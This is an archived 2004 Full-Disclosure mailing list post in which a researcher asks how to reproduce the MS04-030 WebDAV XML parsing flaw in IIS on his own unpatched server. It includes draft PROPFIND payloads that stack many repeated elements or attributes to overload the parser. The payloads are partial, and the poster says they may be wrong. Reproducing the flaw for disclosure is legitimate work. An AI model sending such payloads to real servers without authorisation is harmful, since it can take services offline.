Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details

From: nirvana (karmic_nirvana_at_yahoo.com)
Date: 10/13/04

    To: full-disclosure@lists.netsys.com
    Date: Wed, 13 Oct 2004 10:51:59 -0700 (PDT)
    
    

    I tried attributes in a single tag too, like...

    <x:elem x:attr="value" x:attr="value" x:attr="value"
    x:attr="value" x:attr="value"...........so on />

    --- nirvana <karmic_nirvana@yahoo.com> wrote:

    > Hi List,
    > I've been trying to reproduce this vulnerability
    > (MS04-030) on my unpatched IIS. I am sending a
    > request with an element which has multiple/many
    > attributes.
    > With my limited knowledge of WebDAV, I think the
    > attributes per element can be sent in two ways:
    > 1. in one line, in the element tag only
    > 2. in multiple per-attribute tags.
    >
    > The request I am sending is something like this (XML
    > Data only from a PROPFIND Request, with multiple
    > tags)...
    >
    > <?xml version="1.0" encoding="utf-8" ?>
    > <D:propfind xmlns:D="DAV:">
    > <D:prop xmlns:ns="DAV:"><ns:displayname/>
    > <ns:displayname>
    > <attrib1>a</attrib1>
    > <attrib1>a</attrib1>
    > .
    > .
    > .
    > .
    > <attrib1>a</attrib1>
    > </ns:displayname>
    > </D:prop>
    > </D:propfind>
    >
    >
    >
    > Please feel free to rant at me if I am doing it wrong :).
    >
    > Thanks.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

